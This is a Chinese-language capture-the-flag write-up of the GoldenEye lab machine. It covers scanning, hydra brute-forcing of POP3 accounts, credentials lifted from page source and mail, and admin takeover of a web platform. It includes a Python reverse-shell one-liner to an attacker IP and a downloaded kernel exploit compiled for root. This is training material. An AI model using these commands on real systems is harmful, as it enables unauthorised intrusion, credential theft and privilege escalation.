目录
靶机地址:点我
靶机发布日期:2018.5.4
前言:对于本次靶机练习我使用VMware进行搭建运行,通过Kali进行渗透测试。本人刚入坑系萌新,文章写得不好的地方欢迎大佬们指正。
一、信息收集
导入虚拟机,网络设置NAT模式。
主机存活及端口扫描,这里发现IP为192.168.31.131:
nmap -sn 192.168.32.0/24(或使用Kali自带的工具:arp-scan -l)
nmap -sS -sV -T5 -A -p- 192.168.31.131
开启了25、80、55006和55007端口;
先尝试访问一下网站,页面提示一个登录页面,但我们没有用户名密码,无法进行登录:
尝试查看网页源码,在terminal.js中看到用户名和密码:
这里密码需要HTML转码(网上在线即可),最终用户名密码为boris/InvincibleHack3r
想起之前首页提示的登录框http://192.168.31.131/sev-home/,登录一下试试(这里有个坑点,用户名需要小写)
成功登录,得到提示信息:开启了pop3服务,之前也扫描出了POP3/55007
继续查看源码,在最下面看到两个用户名(提示:这里没看见的话之前的terminal.js中也有这两个用户名):
得到用户名,还知道提供了pop3服务,应该想到爆破一下密码了吧,这里我使用的是hydra
hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.31.131 -s 55007 pop3
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.31.131 -s 55007 pop3
至此,得到两组用户名密码
boris/secret1!
natalya/bird
尝试使用Foxmail进行登录,在natalya用户中发现信息
将靶机IP192.168.31.131与域名severnaya-station.com相关联,并访问severnaya-station.com/gnocertdir
点击登录,输入之前邮件中发现的username:xenia password:RCP90rulez!
成功登录后在message中又发现一个用户doak:
同样使用hydra进行密码爆破,得到doak/goat,登录Foxmail邮箱,发现username:dr_doak password:4England!
在之前网址上登录一下,在My profile==>My private files中发现了一个文本文档:
下载到本地:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
根据提示下载图片到本地,strings命令查看图片:
获得字符串eFdpbnRlcjE5OTV4IQ==,base64解码得到密码:xWinter1995x!
继续在平台中查找线索,在Messages中发现未读消息泄露管理员用户:
二、漏洞利用
使用管理员用户登录admin/xWinter1995x!
在Site administration==>Server==>System paths中设置命令执行,将原来的Path to aspell替换成Python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
本地Kali上开启监听:
nc -lvvp 9999
接下来就是触发反弹shell,根据参考别的资料需要先更改一下设置,
将Site administration==>Plugins==>Text editors==>TinyMCE HTML editor中默认的Google spell改为PSpellShell
然后在blog中新建blog时,点击spellchecker即触发shell
成功触发shell:
知道了内核版本,使用kali自带的工具搜索一下对应漏洞
这里利用第一个漏洞提权,Kali开启web服务
python3 -m http.server 8000
或python -m SimpleHTTPServer 8080
由于目标靶机中并未安装gcc,使用cc编译,需要修改源码,这里方便修改,先使用Python交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'
将15行和143行gcc改为cc
靶机中下载37292.c,使用cc编译、运行:
wget 192.168.31.129:8000/37292.c
cc 37292.c -o 111
chmod 777 111
./111
成功提权
查看root目录下的.flag.txt文件
三、总结
卡在了反弹shell,弹了很久,看网上的说在msf中比较容易操作,可是自己怎么也无法实现,后来才知道是msf的版本太高了,高版本会先查询hosts文件将域名转换成对应的IP进行访问,而我们需要访问的是域名,这点坑了我好久。接下来就是提权了,不太熟悉提权的操作,还是需要多练习练习,本次还是有收获的,学会了如何在没有gcc的情况下用cc进行编译exp。
参考:
https://blog.csdn.net/b10d9/article/details/112157105